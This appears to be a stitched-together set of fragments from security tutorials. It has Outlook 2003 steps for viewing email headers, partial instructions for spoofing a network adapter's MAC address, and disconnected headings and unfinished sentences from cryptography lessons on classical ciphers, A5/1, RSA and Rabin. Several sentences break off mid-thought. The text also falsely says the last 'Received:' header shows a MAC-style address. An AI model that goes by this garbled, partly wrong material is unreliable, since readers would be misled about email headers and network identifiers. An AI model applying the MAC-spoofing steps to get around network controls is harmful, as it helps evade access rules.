Within Outlook (2003) open up the mail by double clicking it.

Click "View" then "Options" in the menu bar.

Find the last "Received:" tag.

It is usually displayed as something like "12:34:56:AB:CD:EF"

Why Why Why?

Implementing a spoofed MAC

Go to the Advanced tab

Scroll down and find "Network Address" in the list box

Classical Crytography - Stupidity, Substitution,

Here the permutation we have chosen is REWQTYUIOPASDFGHJKLZXCVBNM, and so given

Practical Ciphers - Stream Ciphers

A Real Stream Cipher

Cellular Telephones - A5/1

CSPRNGs and Secure Stream Ciphers

RSA and Friends

1 - Factoring. Let p,q be large primes - given N=pq, find p and q.

The Rabin Cryptosystem

Our public key is simply N=pq.

To decrypt we use a very basic mathematical fact:

We choose two large distinct primes, p and q and set N=pq.

NOTE